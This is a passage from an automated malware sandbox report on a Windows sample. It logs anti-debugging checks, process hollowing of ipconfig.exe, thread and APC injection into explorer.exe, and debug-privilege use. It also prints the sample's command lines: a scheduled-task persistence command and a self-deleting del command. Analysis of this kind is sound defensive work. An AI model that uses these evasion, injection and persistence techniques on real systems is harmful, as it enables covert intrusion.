Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015A2ACB mov eax, dword ptr fs:[00000030h] 5_2_015A2ACB
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015A2AE4 mov eax, dword ptr fs:[00000030h] 5_2_015A2AE4
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015AD294 mov eax, dword ptr fs:[00000030h] 5_2_015AD294
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015AD294 mov eax, dword ptr fs:[00000030h] 5_2_015AD294
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0158AAB0 mov eax, dword ptr fs:[00000030h] 5_2_0158AAB0
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0158AAB0 mov eax, dword ptr fs:[00000030h] 5_2_0158AAB0
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015AFAB0 mov eax, dword ptr fs:[00000030h] 5_2_015AFAB0
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015752A5 mov eax, dword ptr fs:[00000030h] 5_2_015752A5
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015752A5 mov eax, dword ptr fs:[00000030h] 5_2_015752A5
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015752A5 mov eax, dword ptr fs:[00000030h] 5_2_015752A5
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015752A5 mov eax, dword ptr fs:[00000030h] 5_2_015752A5
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015752A5 mov eax, dword ptr fs:[00000030h] 5_2_015752A5
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_01597D50 mov eax, dword ptr fs:[00000030h] 5_2_01597D50
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015B3D43 mov eax, dword ptr fs:[00000030h] 5_2_015B3D43
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015F3540 mov eax, dword ptr fs:[00000030h] 5_2_015F3540
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_01623D40 mov eax, dword ptr fs:[00000030h] 5_2_01623D40
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0159C577 mov eax, dword ptr fs:[00000030h] 5_2_0159C577
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0159C577 mov eax, dword ptr fs:[00000030h] 5_2_0159C577
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_01648D34 mov eax, dword ptr fs:[00000030h] 5_2_01648D34
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0163E539 mov eax, dword ptr fs:[00000030h] 5_2_0163E539
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015A4D3B mov eax, dword ptr fs:[00000030h] 5_2_015A4D3B
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015A4D3B mov eax, dword ptr fs:[00000030h] 5_2_015A4D3B
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015A4D3B mov eax, dword ptr fs:[00000030h] 5_2_015A4D3B
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0157AD30 mov eax, dword ptr fs:[00000030h] 5_2_0157AD30
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015FA537 mov eax, dword ptr fs:[00000030h] 5_2_015FA537
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_01583D34 mov eax, dword ptr fs:[00000030h] 5_2_01583D34
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_01583D34 mov eax, dword ptr fs:[00000030h] 5_2_01583D34
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_01583D34 mov eax, dword ptr fs:[00000030h] 5_2_01583D34
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_01583D34 mov eax, dword ptr fs:[00000030h] 5_2_01583D34
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_01583D34 mov eax, dword ptr fs:[00000030h] 5_2_01583D34
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_01583D34 mov eax, dword ptr fs:[00000030h] 5_2_01583D34
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_01583D34 mov eax, dword ptr fs:[00000030h] 5_2_01583D34
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_01583D34 mov eax, dword ptr fs:[00000030h] 5_2_01583D34
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_01583D34 mov eax, dword ptr fs:[00000030h] 5_2_01583D34
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_01583D34 mov eax, dword ptr fs:[00000030h] 5_2_01583D34
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_01583D34 mov eax, dword ptr fs:[00000030h] 5_2_01583D34
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_01583D34 mov eax, dword ptr fs:[00000030h] 5_2_01583D34
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_01583D34 mov eax, dword ptr fs:[00000030h] 5_2_01583D34
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0163FDE2 mov eax, dword ptr fs:[00000030h] 5_2_0163FDE2
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0163FDE2 mov eax, dword ptr fs:[00000030h] 5_2_0163FDE2
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0163FDE2 mov eax, dword ptr fs:[00000030h] 5_2_0163FDE2
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0163FDE2 mov eax, dword ptr fs:[00000030h] 5_2_0163FDE2
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_01628DF1 mov eax, dword ptr fs:[00000030h] 5_2_01628DF1
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015F6DC9 mov eax, dword ptr fs:[00000030h] 5_2_015F6DC9
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015F6DC9 mov eax, dword ptr fs:[00000030h] 5_2_015F6DC9
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015F6DC9 mov eax, dword ptr fs:[00000030h] 5_2_015F6DC9
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015F6DC9 mov ecx, dword ptr fs:[00000030h] 5_2_015F6DC9
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015F6DC9 mov eax, dword ptr fs:[00000030h] 5_2_015F6DC9
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015F6DC9 mov eax, dword ptr fs:[00000030h] 5_2_015F6DC9
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0158D5E0 mov eax, dword ptr fs:[00000030h] 5_2_0158D5E0
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0158D5E0 mov eax, dword ptr fs:[00000030h] 5_2_0158D5E0
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015AFD9B mov eax, dword ptr fs:[00000030h] 5_2_015AFD9B
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015AFD9B mov eax, dword ptr fs:[00000030h] 5_2_015AFD9B
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_016405AC mov eax, dword ptr fs:[00000030h] 5_2_016405AC
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_016405AC mov eax, dword ptr fs:[00000030h] 5_2_016405AC
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015A2581 mov eax, dword ptr fs:[00000030h] 5_2_015A2581
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015A2581 mov eax, dword ptr fs:[00000030h] 5_2_015A2581
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015A2581 mov eax, dword ptr fs:[00000030h] 5_2_015A2581
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015A2581 mov eax, dword ptr fs:[00000030h] 5_2_015A2581
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_01572D8A mov eax, dword ptr fs:[00000030h] 5_2_01572D8A
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_01572D8A mov eax, dword ptr fs:[00000030h] 5_2_01572D8A
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_01572D8A mov eax, dword ptr fs:[00000030h] 5_2_01572D8A
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_01572D8A mov eax, dword ptr fs:[00000030h] 5_2_01572D8A
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_01572D8A mov eax, dword ptr fs:[00000030h] 5_2_01572D8A
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015A1DB5 mov eax, dword ptr fs:[00000030h] 5_2_015A1DB5
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015A1DB5 mov eax, dword ptr fs:[00000030h] 5_2_015A1DB5
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015A1DB5 mov eax, dword ptr fs:[00000030h] 5_2_015A1DB5
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015A35A1 mov eax, dword ptr fs:[00000030h] 5_2_015A35A1
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015AA44B mov eax, dword ptr fs:[00000030h] 5_2_015AA44B
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0160C450 mov eax, dword ptr fs:[00000030h] 5_2_0160C450
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0160C450 mov eax, dword ptr fs:[00000030h] 5_2_0160C450
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0159746D mov eax, dword ptr fs:[00000030h] 5_2_0159746D
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015F6C0A mov eax, dword ptr fs:[00000030h] 5_2_015F6C0A
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015F6C0A mov eax, dword ptr fs:[00000030h] 5_2_015F6C0A
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015F6C0A mov eax, dword ptr fs:[00000030h] 5_2_015F6C0A
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015F6C0A mov eax, dword ptr fs:[00000030h] 5_2_015F6C0A
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_01631C06 mov eax, dword ptr fs:[00000030h] 5_2_01631C06
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_01631C06 mov eax, dword ptr fs:[00000030h] 5_2_01631C06
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_01631C06 mov eax, dword ptr fs:[00000030h] 5_2_01631C06
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_01631C06 mov eax, dword ptr fs:[00000030h] 5_2_01631C06
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_01631C06 mov eax, dword ptr fs:[00000030h] 5_2_01631C06
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_01631C06 mov eax, dword ptr fs:[00000030h] 5_2_01631C06
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_01631C06 mov eax, dword ptr fs:[00000030h] 5_2_01631C06
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_01631C06 mov eax, dword ptr fs:[00000030h] 5_2_01631C06
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_01631C06 mov eax, dword ptr fs:[00000030h] 5_2_01631C06
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_01631C06 mov eax, dword ptr fs:[00000030h] 5_2_01631C06
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_01631C06 mov eax, dword ptr fs:[00000030h] 5_2_01631C06
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_01631C06 mov eax, dword ptr fs:[00000030h] 5_2_01631C06
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_01631C06 mov eax, dword ptr fs:[00000030h] 5_2_01631C06
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_01631C06 mov eax, dword ptr fs:[00000030h] 5_2_01631C06
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0164740D mov eax, dword ptr fs:[00000030h] 5_2_0164740D
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0164740D mov eax, dword ptr fs:[00000030h] 5_2_0164740D
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0164740D mov eax, dword ptr fs:[00000030h] 5_2_0164740D
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015ABC2C mov eax, dword ptr fs:[00000030h] 5_2_015ABC2C
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_016314FB mov eax, dword ptr fs:[00000030h] 5_2_016314FB
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015F6CF0 mov eax, dword ptr fs:[00000030h] 5_2_015F6CF0
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015F6CF0 mov eax, dword ptr fs:[00000030h] 5_2_015F6CF0
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015F6CF0 mov eax, dword ptr fs:[00000030h] 5_2_015F6CF0
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_01648CD6 mov eax, dword ptr fs:[00000030h] 5_2_01648CD6
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0158849B mov eax, dword ptr fs:[00000030h] 5_2_0158849B
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_01648F6A mov eax, dword ptr fs:[00000030h] 5_2_01648F6A
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0158EF40 mov eax, dword ptr fs:[00000030h] 5_2_0158EF40
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0158FF60 mov eax, dword ptr fs:[00000030h] 5_2_0158FF60
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0159F716 mov eax, dword ptr fs:[00000030h] 5_2_0159F716
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015AA70E mov eax, dword ptr fs:[00000030h] 5_2_015AA70E
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015AA70E mov eax, dword ptr fs:[00000030h] 5_2_015AA70E
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0164070D mov eax, dword ptr fs:[00000030h] 5_2_0164070D
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0164070D mov eax, dword ptr fs:[00000030h] 5_2_0164070D
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015AE730 mov eax, dword ptr fs:[00000030h] 5_2_015AE730
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0160FF10 mov eax, dword ptr fs:[00000030h] 5_2_0160FF10
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0160FF10 mov eax, dword ptr fs:[00000030h] 5_2_0160FF10
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_01574F2E mov eax, dword ptr fs:[00000030h] 5_2_01574F2E
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_01574F2E mov eax, dword ptr fs:[00000030h] 5_2_01574F2E
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015B37F5 mov eax, dword ptr fs:[00000030h] 5_2_015B37F5
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015F7794 mov eax, dword ptr fs:[00000030h] 5_2_015F7794
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015F7794 mov eax, dword ptr fs:[00000030h] 5_2_015F7794
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015F7794 mov eax, dword ptr fs:[00000030h] 5_2_015F7794
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_01588794 mov eax, dword ptr fs:[00000030h] 5_2_01588794
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_01587E41 mov eax, dword ptr fs:[00000030h] 5_2_01587E41
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_01587E41 mov eax, dword ptr fs:[00000030h] 5_2_01587E41
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_01587E41 mov eax, dword ptr fs:[00000030h] 5_2_01587E41
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_01587E41 mov eax, dword ptr fs:[00000030h] 5_2_01587E41
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_01587E41 mov eax, dword ptr fs:[00000030h] 5_2_01587E41
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_01587E41 mov eax, dword ptr fs:[00000030h] 5_2_01587E41
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0163AE44 mov eax, dword ptr fs:[00000030h] 5_2_0163AE44
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0163AE44 mov eax, dword ptr fs:[00000030h] 5_2_0163AE44
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0159AE73 mov eax, dword ptr fs:[00000030h] 5_2_0159AE73
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0159AE73 mov eax, dword ptr fs:[00000030h] 5_2_0159AE73
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0159AE73 mov eax, dword ptr fs:[00000030h] 5_2_0159AE73
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0159AE73 mov eax, dword ptr fs:[00000030h] 5_2_0159AE73
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0159AE73 mov eax, dword ptr fs:[00000030h] 5_2_0159AE73
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0158766D mov eax, dword ptr fs:[00000030h] 5_2_0158766D
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015AA61C mov eax, dword ptr fs:[00000030h] 5_2_015AA61C
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015AA61C mov eax, dword ptr fs:[00000030h] 5_2_015AA61C
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0157C600 mov eax, dword ptr fs:[00000030h] 5_2_0157C600
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0157C600 mov eax, dword ptr fs:[00000030h] 5_2_0157C600
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0157C600 mov eax, dword ptr fs:[00000030h] 5_2_0157C600
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015A8E00 mov eax, dword ptr fs:[00000030h] 5_2_015A8E00
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0162FE3F mov eax, dword ptr fs:[00000030h] 5_2_0162FE3F
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_01631608 mov eax, dword ptr fs:[00000030h] 5_2_01631608
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0157E620 mov eax, dword ptr fs:[00000030h] 5_2_0157E620
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015A36CC mov eax, dword ptr fs:[00000030h] 5_2_015A36CC
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015B8EC7 mov eax, dword ptr fs:[00000030h] 5_2_015B8EC7
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0162FEC0 mov eax, dword ptr fs:[00000030h] 5_2_0162FEC0
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_01648ED6 mov eax, dword ptr fs:[00000030h] 5_2_01648ED6
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015A16E0 mov ecx, dword ptr fs:[00000030h] 5_2_015A16E0
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015876E2 mov eax, dword ptr fs:[00000030h] 5_2_015876E2
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_01640EA5 mov eax, dword ptr fs:[00000030h] 5_2_01640EA5
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_01640EA5 mov eax, dword ptr fs:[00000030h] 5_2_01640EA5
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_01640EA5 mov eax, dword ptr fs:[00000030h] 5_2_01640EA5
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0160FE87 mov eax, dword ptr fs:[00000030h] 5_2_0160FE87
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015F46A7 mov eax, dword ptr fs:[00000030h] 5_2_015F46A7
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00DEB8D0 mov eax, dword ptr fs:[00000030h] 15_2_00DEB8D0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00DEB8D0 mov ecx, dword ptr fs:[00000030h] 15_2_00DEB8D0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00DEB8D0 mov eax, dword ptr fs:[00000030h] 15_2_00DEB8D0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00DEB8D0 mov eax, dword ptr fs:[00000030h] 15_2_00DEB8D0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00DEB8D0 mov eax, dword ptr fs:[00000030h] 15_2_00DEB8D0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00DEB8D0 mov eax, dword ptr fs:[00000030h] 15_2_00DEB8D0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D558EC mov eax, dword ptr fs:[00000030h] 15_2_00D558EC
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D59080 mov eax, dword ptr fs:[00000030h] 15_2_00D59080
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00DD3884 mov eax, dword ptr fs:[00000030h] 15_2_00DD3884
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00DD3884 mov eax, dword ptr fs:[00000030h] 15_2_00DD3884
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D8F0BF mov ecx, dword ptr fs:[00000030h] 15_2_00D8F0BF
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D8F0BF mov eax, dword ptr fs:[00000030h] 15_2_00D8F0BF
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D8F0BF mov eax, dword ptr fs:[00000030h] 15_2_00D8F0BF
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D990AF mov eax, dword ptr fs:[00000030h] 15_2_00D990AF
Enables debug privileges
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\ipconfig.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Memory written: C:\Users\user\Desktop\08917506_by_Libranalysis.exe base: 400000 value starts with: 4D5A
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Section loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Section loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Thread register set: target process: 3292
Source: C:\Windows\SysWOW64\ipconfig.exe Thread register set: target process: 3292
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Thread APC queued: target process: C:\Windows\explorer.exe
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Section unmapped: C:\Windows\SysWOW64\ipconfig.exe base address: 1380000
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\OfCxSfBf' /XML 'C:\Users\user\AppData\Local\Temp\tmpFA9B.tmp'
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Process created: C:\Users\user\Desktop\08917506_by_Libranalysis.exe C:\Users\user\Desktop\08917506_by_Libranalysis.exe
Source: C:\Windows\SysWOW64\ipconfig.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\08917506_by_Libranalysis.exe'
Source: explorer.exe, 00000007.00000000.254624885.0000000001400000.00000002.00000001.sdmp, ipconfig.exe, 0000000F.00000002.499457554.0000000005480000.00000002.00000001.sdmp Binary or memory string: uProgram Manager
Source: explorer.exe, 00000007.00000000.254624885.0000000001400000.00000002.00000001.sdmp, ipconfig.exe, 0000000F.00000002.499457554.0000000005480000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000007.00000000.254624885.0000000001400000.00000002.00000001.sdmp, ipconfig.exe, 0000000F.00000002.499457554.0000000005480000.00000002.00000001.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000007.00000002.493138403.0000000000EB8000.00000004.00000020.sdmp Binary or memory string: ProgmanX
Source: explorer.exe, 00000007.00000000.254624885.0000000001400000.00000002.00000001.sdmp, ipconfig.exe, 0000000F.00000002.499457554.0000000005480000.00000002.00000001.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000007.00000000.277780603.0000000008ACF000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWndAj

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
